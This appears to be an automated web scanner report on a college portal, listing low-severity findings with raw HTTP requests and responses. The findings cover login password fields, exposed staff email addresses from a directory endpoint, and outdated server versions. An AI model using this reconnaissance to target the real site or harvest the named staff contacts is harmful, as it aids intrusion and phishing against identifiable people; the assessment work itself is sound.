HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Location: https://my.champlain.edu Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=83os928btu X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:26 GMT Connection: close Content-Length: 165 <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://my |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /x1501.xml |
GET /x1501.xml HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=07eq083dhl X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:21 GMT Connection: close Content-Length: 1229 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /xhr/dird |
GET /xhr/dird HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=gkilk8211c X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:39 GMT Connection: close Content-Length: 39 <br /><br /><b>Invalid input.<b></br /> |
Severity: | Low |
Confidence: | Firm |
Host: | https://my.champlain.edu |
Path: | /xhr/dirp |
GET /xhr/dirp HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=tf84vmr8ar X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:38 GMT Connection: close Content-Length: 39 <br /><br /><b>Invalid input.<b></br /> |
Severity: | Low |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | / |
GET / HTTP/1.1 Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: http://search.champlain Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=4d7d8kkrde X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:08:23 GMT Content-Length: 9068 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... </div> <form method="post" action="/auth/login"> <table border="0" cellspacing="0" align="right" class="myLoginTable"> ...[SNIP]... <td> <input name="password" type="Password" height="20" id="loginPassword" tabindex="2" /> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /index/index/forceload |
GET /index/index/forceload Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=vjmhpnkk97 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:24 GMT Connection: close Content-Length: 9104 <!DOCTYPE html> <html lang="en"> <head> <!-- Champlain College Portal Author: Matt Huwiler, 2010 Comments and feedback welcome. --> <meta http-equiv="Content-Type" content="text/html; charset= ...[SNIP]... </div> <form method="post" action="/auth/login"> <table border="0" cellspacing="0" align="right" class="myLoginTable"> ...[SNIP]... <td> <input name="password" type="Password" height="20" id="loginPassword" tabindex="2" /> </td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widget_login |
GET /widget_login HTTP/1.1 Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Content-Type: application/x-www-form X-Requested-With: XMLHttpRequest Referer: https://my.champlain.edu Cookie: PHPSESSID=d1k3utclea Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:26:33 GMT Content-Length: 2397 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... <div> <form method="post" action="/auth/login"> <div id="loginWidgetError" style="display:none; color:red; text-align:center;"> ...[SNIP]... <td valign="top"><input type="password" name="password" id="loginWidgetPassword" /></td> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /advising/curriculum/ |
GET /advising/curriculum/ HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=atvqqu6pjm X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:33 GMT Connection: close Content-Length: 172700 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: Matt Huwiler (huwilerm@champlain.edu), 2009 Comments and feedback welcome. --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /media/changeaddr.html |
GET /media/changeaddr.html HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 02 Mar 2011 18:37:03 GMT Accept-Ranges: bytes ETag: "3336ead28d9cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:33 GMT Connection: close Content-Length: 847 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <a href="mailto:arc@champlain.edu">arc@champlain.edu</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /page_about |
GET /page_about HTTP/1.1 Host: my.champlain.edu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: */* Referer: https://my.champlain.edu Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:26 GMT Content-Length: 7931 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: Matt Huwiler (huwilerm@champlain.edu), 2009 Comments and feedback welcome. --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /page_authrequired |
GET /page_authrequired HTTP/1.1 Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://my.champlain.edu/ Cookie: PHPSESSID=d1k3utclea Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:26:22 GMT Content-Length: 2664 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: Matt Huwiler (huwilerm@champlain.edu), 2009 Comments and feedback welcome. --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /public/human_resources |
GET /public/human_resources Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=an4qlsuvvs X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:27 GMT Connection: close Content-Length: 2643 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <!-- Champlain College Portal Author: Matt Huwiler (huwilerm@champlain.edu), 2009 Comments and feedback welcome. --> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /xhr/dird |
POST /xhr/dird HTTP/1.1 Host: my.champlain.edu Connection: keep-alive Content-Length: 50 Origin: https://my.champlain.edu X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde name=Pellitier&department |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:49:54 GMT Content-Length: 1314 <br /><b>Results (4)</b>:<br /><div align="center" style="padding-bottom:5px Wheeler, Linda<br />Director, Events Center< ...[SNIP]... <a href="mailto:lwheeler@champlain.edu">lwheeler@champlain.edu</a> ...[SNIP]... <a href="mailto:jkuzia@champlain.edu">jkuzia@champlain.edu</a> ...[SNIP]... <a href="mailto:slindberg@champlain.edu">slindberg@champlain.edu</a> ...[SNIP]... <a href="mailto:mmarcoux@champlain.edu">mmarcoux@champlain.edu</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /media/changeaddr.html |
GET /media/changeaddr.html HTTP/1.1 Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 02 Mar 2011 18:37:03 GMT Accept-Ranges: bytes ETag: "3336ead28d9cb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:33 GMT Connection: close Content-Length: 847 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /media/new_course_codes |
GET /media/new_course_codes Host: my.champlain.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: application/pdf Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 28 Sep 2011 16:22:05 GMT Accept-Ranges: bytes ETag: "ad7924c3fa7dcc1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 02:00:33 GMT Connection: close Content-Length: 107868 %PDF-1.5%.... 2020 0 obj<</Linearized 1/L 107868/O 2022/E 53890/N 5/T 107416/H [ 501 216]>>endobj 2038 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /scripts/prod/library |
GET /scripts/prod/library Host: my.champlain.edu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 03 Mar 2010 17:42:15 GMT Accept-Ranges: bytes ETag: "7d6b4dcf8baca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:51:21 GMT Content-Length: 1157 ({"removeFormat":"Remove Format","copy":"Copy", ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /scripts/prod/library |
GET /scripts/prod/library Host: my.champlain.edu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT Accept-Ranges: bytes ETag: "87b412dcf8baca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:51:21 GMT Content-Length: 70 ({"iframeEditTitle":"edit area","iframeFocusTitle": |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /scripts/prod/library |
GET /scripts/prod/library Host: my.champlain.edu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: */* Referer: https://my.champlain.edu Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT Accept-Ranges: bytes ETag: "477917dcf8baca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:51:46 GMT Content-Length: 142 ({"rangeMessage":"This value is out of range.","invalidMessage": |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /scripts/prod/library |
GET /scripts/prod/library Host: my.champlain.edu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT Accept-Ranges: bytes ETag: "a71453dcf8baca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:49 GMT Content-Length: 83 ({"buttonOk":"OK", |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /scripts/prod/library |
GET /scripts/prod/library Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://my.champlain.edu/ Cookie: PHPSESSID=d1k3utclea Content-Length: 10 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Expires: Tue, 19 Jan 2038 03:14:07 GMT Last-Modified: Wed, 03 Mar 2010 17:42:14 GMT Accept-Ranges: bytes ETag: "279e5cdcf8baca1:0" Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:08:55 GMT Content-Length: 71 ({"loadingState":"Loading |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets |
GET /feedback/allwidgets HTTP/1.1 Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:51:15 GMT Content-Length: 632 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
POST /feedback/allwidgets98d24 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Content-Length: 37 Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US renderableItem=%2Fshow |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=clgvlihm9n X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:53:45 GMT Content-Length: 761 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /feedback/allwidgets98d24 |
POST /feedback/allwidgets98d24 Accept: text/html, application/xhtml+xml, */* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Content-Type: application/x-www-form Accept-Encoding: gzip, deflate Cookie: mycc_ss=2 Host: my.champlain.edu Content-Length: 37 Connection: Keep-Alive Cache-Control: no-cache Accept-Language: en-US renderableItem=%2Fshow |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 Set-Cookie: PHPSESSID=1s8lc1gfnq X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 14:38:11 GMT Content-Length: 803 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /page_form_misc |
GET /page_form_misc Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Content-Type: application/x-www-form X-Requested-With: XMLHttpRequest Referer: https://my.champlain.edu/ Cookie: PHPSESSID=d1k3utclea Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:09:02 GMT Content-Length: 7974 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dash ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widget_campusdir |
GET /widget_campusdir Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:45 GMT Content-Length: 7256 <div style="style="border-top: 1px dashed rgb(235, 234, 219);"> <img src="/imgs/page_element ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widget_login |
GET /widget_login HTTP/1.1 Host: my.champlain.edu User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Content-Type: application/x-www-form X-Requested-With: XMLHttpRequest Referer: https://my.champlain.edu Cookie: PHPSESSID=d1k3utclea Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Sun, 25 Dec 2011 21:26:33 GMT Content-Length: 2397 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widgets/widget_campusdir |
GET /widgets/widget_campusdir Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:42 GMT Content-Length: 4918 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.dash ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widgets/widget_events/ |
GET /widgets/widget_events/ HTTP/1.1 Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Server: Microsoft-IIS/7.5 X-Powered-By: PHP/5.2.12 X-Powered-By: ASP.NET Date: Mon, 26 Dec 2011 01:45:42 GMT Content-Length: 7204 <div style="display:none;">IE Hack</div> <div dojoType="dijit.layout <script type="dojo/method"> var self; if (typeof(window.portal) != 'undefined') self = window.portal.da ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://my.champlain.edu |
Path: | /widgets/widget_resources |
GET /widgets/widget_resources Host: my.champlain.edu Connection: keep-alive X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Content-Type: application/x-www-form Accept: */* Referer: https://my.champlain.edu/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=4d7d8kkrde Content-Length: 10 |
